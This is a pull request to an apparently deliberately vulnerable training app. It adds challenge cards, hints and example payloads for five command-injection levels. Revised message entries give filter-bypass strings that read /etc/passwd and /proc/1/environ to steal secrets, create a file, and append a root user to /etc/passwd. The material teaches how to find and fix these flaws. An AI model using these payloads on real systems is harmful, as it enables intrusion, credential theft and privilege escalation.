### PR TITLE
feat: add ChallengeCard annotations to CommandInjection levels

### DIFF
--- a/src/main/java/org/sasanlabs/service/vulnerability/commandInjection/CommandInjection.java
+++ b/src/main/java/org/sasanlabs/service/vulnerability/commandInjection/CommandInjection.java
@@ -9,6 +9,7 @@ import org.apache.commons.lang3.StringUtils;
 import org.sasanlabs.internal.utility.LevelConstants;
 import org.sasanlabs.internal.utility.Variant;
 import org.sasanlabs.internal.utility.annotations.AttackVector;
+import org.sasanlabs.internal.utility.annotations.ChallengeCard;
 import org.sasanlabs.internal.utility.annotations.VulnerableAppRequestMapping;
 import org.sasanlabs.internal.utility.annotations.VulnerableAppRestController;
 import org.sasanlabs.service.exception.ServiceApplicationException;
@@ -64,6 +65,17 @@ public class CommandInjection {
     @AttackVector(
             vulnerabilityExposed = VulnerabilityType.COMMAND_INJECTION,
             description = "COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED")
+    @ChallengeCard(
+            challengeText = "COMMAND_INJECTION_LEVEL_1_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "COMMAND_INJECTION_LEVEL_1_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "COMMAND_INJECTION_LEVEL_1_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "COMMAND_INJECTION_LEVEL_1_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "COMMAND_INJECTION_LEVEL_1_PAYLOAD_DESCRIPTION",
+                            value = "COMMAND_INJECTION_LEVEL_1_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(value = LevelConstants.LEVEL_1, htmlTemplate = "LEVEL_1/CI_Level1")
     public ResponseEntity<GenericVulnerabilityResponseBean<String>> getVulnerablePayloadLevel1(
             @RequestParam(IP_ADDRESS) String ipAddress) throws IOException {
@@ -79,6 +91,17 @@ public class CommandInjection {
             vulnerabilityExposed = VulnerabilityType.COMMAND_INJECTION,
             description =
                     "COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_NOT_PRESENT")
+    @ChallengeCard(
+            challengeText = "COMMAND_INJECTION_LEVEL_2_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "COMMAND_INJECTION_LEVEL_2_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "COMMAND_INJECTION_LEVEL_2_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "COMMAND_INJECTION_LEVEL_2_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "COMMAND_INJECTION_LEVEL_2_PAYLOAD_DESCRIPTION",
+                            value = "COMMAND_INJECTION_LEVEL_2_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(value = LevelConstants.LEVEL_2, htmlTemplate = "LEVEL_1/CI_Level1")
     public ResponseEntity<GenericVulnerabilityResponseBean<String>> getVulnerablePayloadLevel2(
             @RequestParam(IP_ADDRESS) String ipAddress, RequestEntity<String> requestEntity)
@@ -102,6 +125,17 @@ public class CommandInjection {
             vulnerabilityExposed = VulnerabilityType.COMMAND_INJECTION,
             description =
                     "COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_%26_%3B_NOT_PRESENT")
+    @ChallengeCard(
+            challengeText = "COMMAND_INJECTION_LEVEL_3_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "COMMAND_INJECTION_LEVEL_3_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "COMMAND_INJECTION_LEVEL_3_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "COMMAND_INJECTION_LEVEL_3_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "COMMAND_INJECTION_LEVEL_3_PAYLOAD_DESCRIPTION",
+                            value = "COMMAND_INJECTION_LEVEL_3_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(value = LevelConstants.LEVEL_3, htmlTemplate = "LEVEL_1/CI_Level1")
     public ResponseEntity<GenericVulnerabilityResponseBean<String>> getVulnerablePayloadLevel3(
             @RequestParam(IP_ADDRESS) String ipAddress, RequestEntity<String> requestEntity)
@@ -128,6 +162,17 @@ public class CommandInjection {
             vulnerabilityExposed = VulnerabilityType.COMMAND_INJECTION,
             description =
                     "COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_%26_%3B_CASE_INSENSITIVE_NOT_PRESENT")
+    @ChallengeCard(
+            challengeText = "COMMAND_INJECTION_LEVEL_4_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "COMMAND_INJECTION_LEVEL_4_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "COMMAND_INJECTION_LEVEL_4_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "COMMAND_INJECTION_LEVEL_4_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "COMMAND_INJECTION_LEVEL_4_PAYLOAD_DESCRIPTION",
+                            value = "COMMAND_INJECTION_LEVEL_4_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(value = LevelConstants.LEVEL_4, htmlTemplate = "LEVEL_1/CI_Level1")
     public ResponseEntity<GenericVulnerabilityResponseBean<String>> getVulnerablePayloadLevel4(
             @RequestParam(IP_ADDRESS) String ipAddress, RequestEntity<String> requestEntity)
@@ -153,6 +198,17 @@ public class CommandInjection {
             vulnerabilityExposed = VulnerabilityType.COMMAND_INJECTION,
             description =
                     "COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_%26_%3B_%7C_CASE_INSENSITIVE_NOT_PRESENT")
+    @ChallengeCard(
+            challengeText = "COMMAND_INJECTION_LEVEL_5_CHALLENGE",
+            hints = {
+                @ChallengeCard.Hint(order = 1, text = "COMMAND_INJECTION_LEVEL_5_HINT_1"),
+                @ChallengeCard.Hint(order = 2, text = "COMMAND_INJECTION_LEVEL_5_HINT_2"),
+                @ChallengeCard.Hint(order = 3, text = "COMMAND_INJECTION_LEVEL_5_HINT_3")
+            },
+            payload =
+                    @ChallengeCard.Payload(
+                            description = "COMMAND_INJECTION_LEVEL_5_PAYLOAD_DESCRIPTION",
+                            value = "COMMAND_INJECTION_LEVEL_5_PAYLOAD_VALUE"))
     @VulnerableAppRequestMapping(value = LevelConstants.LEVEL_5, htmlTemplate = "LEVEL_1/CI_Level1")
     public ResponseEntity<GenericVulnerabilityResponseBean<String>> getVulnerablePayloadLevel5(
             @RequestParam(IP_ADDRESS) String ipAddress, RequestEntity<String> requestEntity)

--- a/src/main/resources/i18n/messages.properties
+++ b/src/main/resources/i18n/messages.properties
@@ -195,6 +195,42 @@ COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_%26
 COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_%26_%3B_CASE_INSENSITIVE_NOT_PRESENT=\"ipaddress\" query param's value is directly executed if \";\", \"&\", \"%26\", \"%3B\", \"%3b\" or space characters are not present in it.
 COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_%26_%3B_%7C_CASE_INSENSITIVE_NOT_PRESENT=\"ipaddress\" query param's value is directly executed if \";\", \"&\", \"%26\", \"%3B\", \"%3b\", \"%7C\", \"%7c\" or space characters are not present in it.
 
+# Challenge Mode - Command Injection
+COMMAND_INJECTION_LEVEL_1_CHALLENGE=Execute an arbitrary operating system command by injecting into the "ipaddress" parameter.
+COMMAND_INJECTION_LEVEL_1_HINT_1=The "ipaddress" parameter is concatenated directly into the ping command without any validation.
+COMMAND_INJECTION_LEVEL_1_HINT_2=Shell metacharacters like semicolons (;), pipes (|), or logical AND (&&) can chain multiple commands.
+COMMAND_INJECTION_LEVEL_1_HINT_3=Try appending a second command after the ping using a semicolon, e.g. 127.0.0.1; ls
+COMMAND_INJECTION_LEVEL_1_PAYLOAD_DESCRIPTION=Classic semicolon-based command injection payload.
+COMMAND_INJECTION_LEVEL_1_PAYLOAD_VALUE=127.0.0.1; ls
+
+COMMAND_INJECTION_LEVEL_2_CHALLENGE=Bypass the basic character filter that blocks semicolons, ampersands, and spaces in the URL.
+COMMAND_INJECTION_LEVEL_2_HINT_1=The validator checks the raw URL string for the characters ;, &, and space using a regex pattern.
+COMMAND_INJECTION_LEVEL_2_HINT_2=The pipe character (|) is not included in the blocklist and can also chain commands.
+COMMAND_INJECTION_LEVEL_2_HINT_3=Use the pipe to chain commands without a space, e.g. 127.0.0.1|ls
+COMMAND_INJECTION_LEVEL_2_PAYLOAD_DESCRIPTION=Pipe-based command injection bypassing the semicolon/ampersand/space filter.
+COMMAND_INJECTION_LEVEL_2_PAYLOAD_VALUE=127.0.0.1|ls
+
+COMMAND_INJECTION_LEVEL_3_CHALLENGE=Bypass the enhanced filter that also blocks URL-encoded semicolons (%3B) and ampersands (%26).
+COMMAND_INJECTION_LEVEL_3_HINT_1=The filter now checks for %26 and %3B in the URL, but the comparison is case-sensitive.
+COMMAND_INJECTION_LEVEL_3_HINT_2=URL-encoded characters can use lowercase or uppercase hex digits. %3b is different from %3B to a case-sensitive check.
+COMMAND_INJECTION_LEVEL_3_HINT_3=Try using lowercase %3b to bypass the case-sensitive filter, e.g. 127.0.0.1%3bls
+COMMAND_INJECTION_LEVEL_3_PAYLOAD_DESCRIPTION=Lowercase URL-encoded semicolon bypassing a case-sensitive filter.
+COMMAND_INJECTION_LEVEL_3_PAYLOAD_VALUE=127.0.0.1%3bls
+
+COMMAND_INJECTION_LEVEL_4_CHALLENGE=Bypass the case-insensitive filter that catches both %3B and %3b, as well as %26.
+COMMAND_INJECTION_LEVEL_4_HINT_1=The filter now uses toUpperCase() before checking for %26 and %3B, so case variation no longer works.
+COMMAND_INJECTION_LEVEL_4_HINT_2=The pipe character (|) and its URL-encoded form %7C are still not blocked by any of the checks.
+COMMAND_INJECTION_LEVEL_4_HINT_3=Use the URL-encoded pipe %7C to chain commands, e.g. 127.0.0.1%7Cls
+COMMAND_INJECTION_LEVEL_4_PAYLOAD_DESCRIPTION=URL-encoded pipe bypassing the case-insensitive encoded character filter.
+COMMAND_INJECTION_LEVEL_4_PAYLOAD_VALUE=127.0.0.1%7Cls
+
+COMMAND_INJECTION_LEVEL_5_CHALLENGE=Bypass the strict filter that blocks semicolons, ampersands, spaces, and URL-encoded pipes (%7C).
+COMMAND_INJECTION_LEVEL_5_HINT_1=The filter now also blocks %7C and %7c (case-insensitive), closing the pipe bypass.
+COMMAND_INJECTION_LEVEL_5_HINT_2=Newline characters can also separate commands in shell execution, and %0A (URL-encoded newline) is not blocked.
+COMMAND_INJECTION_LEVEL_5_HINT_3=Use a URL-encoded newline to inject a second command, e.g. 127.0.0.1%0Als
+COMMAND_INJECTION_LEVEL_5_PAYLOAD_DESCRIPTION=Newline-based command injection bypassing all metacharacter filters.
+COMMAND_INJECTION_LEVEL_5_PAYLOAD_VALUE=127.0.0.1%0Als
+
 
 # Local File Injection
 #URL_BASED_LFI_INJECTION=Url based Local File Injection attack.

--- a/src/main/resources/i18n/messages.properties
+++ b/src/main/resources/i18n/messages.properties
@@ -203,33 +203,33 @@ COMMAND_INJECTION_LEVEL_1_HINT_3=Try appending a second command after the ping u
 COMMAND_INJECTION_LEVEL_1_PAYLOAD_DESCRIPTION=Classic semicolon-based command injection payload.
 COMMAND_INJECTION_LEVEL_1_PAYLOAD_VALUE=127.0.0.1; ls
 
-COMMAND_INJECTION_LEVEL_2_CHALLENGE=Bypass the basic character filter that blocks semicolons, ampersands, and spaces in the URL.
+COMMAND_INJECTION_LEVEL_2_CHALLENGE=Read the contents of a sensitive operating system file (for example, /etc/passwd on Linux or C:\\Windows\\System32\\drivers\\etc\\hosts on Windows).
 COMMAND_INJECTION_LEVEL_2_HINT_1=The validator checks the raw URL string for the characters ;, &, and space using a regex pattern.
 COMMAND_INJECTION_LEVEL_2_HINT_2=The pipe character (|) is not included in the blocklist and can also chain commands.
 COMMAND_INJECTION_LEVEL_2_HINT_3=Use the pipe to chain commands without a space, e.g. 127.0.0.1|ls
-COMMAND_INJECTION_LEVEL_2_PAYLOAD_DESCRIPTION=Pipe-based command injection bypassing the semicolon/ampersand/space filter.
-COMMAND_INJECTION_LEVEL_2_PAYLOAD_VALUE=127.0.0.1|ls
+COMMAND_INJECTION_LEVEL_2_PAYLOAD_DESCRIPTION=Pipe-based command injection that reads /etc/passwd, bypassing the semicolon/ampersand/space filter.
+COMMAND_INJECTION_LEVEL_2_PAYLOAD_VALUE=127.0.0.1|cat%20/etc/passwd
 
-COMMAND_INJECTION_LEVEL_3_CHALLENGE=Bypass the enhanced filter that also blocks URL-encoded semicolons (%3B) and ampersands (%26).
+COMMAND_INJECTION_LEVEL_3_CHALLENGE=Create a file named "challenge.html" on the server.
 COMMAND_INJECTION_LEVEL_3_HINT_1=The filter now checks for %26 and %3B in the URL, but the comparison is case-sensitive.
 COMMAND_INJECTION_LEVEL_3_HINT_2=URL-encoded characters can use lowercase or uppercase hex digits. %3b is different from %3B to a case-sensitive check.
 COMMAND_INJECTION_LEVEL_3_HINT_3=Try using lowercase %3b to bypass the case-sensitive filter, e.g. 127.0.0.1%3bls
-COMMAND_INJECTION_LEVEL_3_PAYLOAD_DESCRIPTION=Lowercase URL-encoded semicolon bypassing a case-sensitive filter.
-COMMAND_INJECTION_LEVEL_3_PAYLOAD_VALUE=127.0.0.1%3bls
+COMMAND_INJECTION_LEVEL_3_PAYLOAD_DESCRIPTION=Lowercase URL-encoded semicolon bypassing a case-sensitive filter to create a file on the server.
+COMMAND_INJECTION_LEVEL_3_PAYLOAD_VALUE=127.0.0.1%3btouch%20challenge.html
 
-COMMAND_INJECTION_LEVEL_4_CHALLENGE=Bypass the case-insensitive filter that catches both %3B and %3b, as well as %26.
-COMMAND_INJECTION_LEVEL_4_HINT_1=The filter now uses toUpperCase() before checking for %26 and %3B, so case variation no longer works.
-COMMAND_INJECTION_LEVEL_4_HINT_2=The pipe character (|) and its URL-encoded form %7C are still not blocked by any of the checks.
-COMMAND_INJECTION_LEVEL_4_HINT_3=Use the URL-encoded pipe %7C to chain commands, e.g. 127.0.0.1%7Cls
-COMMAND_INJECTION_LEVEL_4_PAYLOAD_DESCRIPTION=URL-encoded pipe bypassing the case-insensitive encoded character filter.
-COMMAND_INJECTION_LEVEL_4_PAYLOAD_VALUE=127.0.0.1%7Cls
+COMMAND_INJECTION_LEVEL_4_CHALLENGE=Steal secrets from the web server process environment (for example, database passwords or API keys) by reading /proc/1/environ.
+COMMAND_INJECTION_LEVEL_4_HINT_1=The filter now blocks %26 and %3B case-insensitively, but the URL-encoded pipe %7C is still not checked.
+COMMAND_INJECTION_LEVEL_4_HINT_2=The Java process stores secrets like database passwords and API keys in its environment. The /proc filesystem exposes the main process's environment at /proc/1/environ.
+COMMAND_INJECTION_LEVEL_4_HINT_3=Use the URL-encoded pipe %7C to chain a command that reads the main process environment, e.g. 127.0.0.1%7Ccat%20/proc/1/environ
+COMMAND_INJECTION_LEVEL_4_PAYLOAD_DESCRIPTION=URL-encoded pipe bypassing the case-insensitive filter to read the main process environment and steal secrets.
+COMMAND_INJECTION_LEVEL_4_PAYLOAD_VALUE=127.0.0.1%7Ccat%20/proc/1/environ
 
-COMMAND_INJECTION_LEVEL_5_CHALLENGE=Bypass the strict filter that blocks semicolons, ampersands, spaces, and URL-encoded pipes (%7C).
-COMMAND_INJECTION_LEVEL_5_HINT_1=The filter now also blocks %7C and %7c (case-insensitive), closing the URL-encoded pipe bypass.
-COMMAND_INJECTION_LEVEL_5_HINT_2=Newline characters can also separate commands in shell execution, and %0A (URL-encoded newline) is not blocked.
-COMMAND_INJECTION_LEVEL_5_HINT_3=Use a URL-encoded newline to inject a second command, e.g. 127.0.0.1%0Als
-COMMAND_INJECTION_LEVEL_5_PAYLOAD_DESCRIPTION=Newline-based command injection bypassing all metacharacter filters.
-COMMAND_INJECTION_LEVEL_5_PAYLOAD_VALUE=127.0.0.1%0Als
+COMMAND_INJECTION_LEVEL_5_CHALLENGE=Create a new root user on the server by appending to /etc/passwd, demonstrating how command injection can grant unauthorized privileged access.
+COMMAND_INJECTION_LEVEL_5_HINT_1=The filter now also blocks %7C case-insensitively, closing the URL-encoded pipe bypass.
+COMMAND_INJECTION_LEVEL_5_HINT_2=Newline characters can separate commands in shell execution, and %0A (URL-encoded newline) is not blocked. Also, the app runs as root, so it can write to /etc/passwd.
+COMMAND_INJECTION_LEVEL_5_HINT_3=Append a new root user (UID 0) to /etc/passwd using echo and >> (URL-encoded as %3E%3E), e.g. 127.0.0.1%0Aecho%20"hacker:x:0:0:root:/root:/bin/sh"%20%3E%3E%20/etc/passwd
+COMMAND_INJECTION_LEVEL_5_PAYLOAD_DESCRIPTION=Newline-based command injection bypassing all metacharacter filters to create a root user in /etc/passwd.
+COMMAND_INJECTION_LEVEL_5_PAYLOAD_VALUE=127.0.0.1%0Aecho%20"hacker:x:0:0:root:/root:/bin/sh"%20%3E%3E%20/etc/passwd
 
 
 # Local File Injection

--- a/src/main/resources/i18n/messages.properties
+++ b/src/main/resources/i18n/messages.properties
@@ -197,7 +197,7 @@ COMMAND_INJECTION_URL_PARAM_DIRECTLY_EXECUTED_IF_SEMICOLON_SPACE_LOGICAL_AND_%26
 
 # Challenge Mode - Command Injection
 COMMAND_INJECTION_LEVEL_1_CHALLENGE=Execute an arbitrary operating system command by injecting into the "ipaddress" parameter.
-COMMAND_INJECTION_LEVEL_1_HINT_1=The "ipaddress" parameter is concatenated directly into the ping command without any validation.
+COMMAND_INJECTION_LEVEL_1_HINT_1=The "ipaddress" parameter is concatenated directly into the ping command without any command-injection filtering or IP-format validation.
 COMMAND_INJECTION_LEVEL_1_HINT_2=Shell metacharacters like semicolons (;), pipes (|), or logical AND (&&) can chain multiple commands.
 COMMAND_INJECTION_LEVEL_1_HINT_3=Try appending a second command after the ping using a semicolon, e.g. 127.0.0.1; ls
 COMMAND_INJECTION_LEVEL_1_PAYLOAD_DESCRIPTION=Classic semicolon-based command injection payload.
@@ -225,7 +225,7 @@ COMMAND_INJECTION_LEVEL_4_PAYLOAD_DESCRIPTION=URL-encoded pipe bypassing the cas
 COMMAND_INJECTION_LEVEL_4_PAYLOAD_VALUE=127.0.0.1%7Cls
 
 COMMAND_INJECTION_LEVEL_5_CHALLENGE=Bypass the strict filter that blocks semicolons, ampersands, spaces, and URL-encoded pipes (%7C).
-COMMAND_INJECTION_LEVEL_5_HINT_1=The filter now also blocks %7C and %7c (case-insensitive), closing the pipe bypass.
+COMMAND_INJECTION_LEVEL_5_HINT_1=The filter now also blocks %7C and %7c (case-insensitive), closing the URL-encoded pipe bypass.
 COMMAND_INJECTION_LEVEL_5_HINT_2=Newline characters can also separate commands in shell execution, and %0A (URL-encoded newline) is not blocked.
 COMMAND_INJECTION_LEVEL_5_HINT_3=Use a URL-encoded newline to inject a second command, e.g. 127.0.0.1%0Als
 COMMAND_INJECTION_LEVEL_5_PAYLOAD_DESCRIPTION=Newline-based command injection bypassing all metacharacter filters.


### PR DESCRIPTION
Add @ChallengeCard metadata (challenge text, hints, and payload descriptions) to command injection vulnerability levels 1-5 to support challenge-based learning and guided exploitation.

fixes #556

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **New Features**
  - Added challenge-mode content for five progressive Command Injection levels.
  - Each level now includes challenge descriptions, three hints, payload explanations, and example payloads.
  - Added localized guidance covering semicolon, pipe, case-sensitive, encoded-character, and encoded-newline techniques.
  - Expanded interactive learning materials to help users understand and explore progressively advanced injection scenarios.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->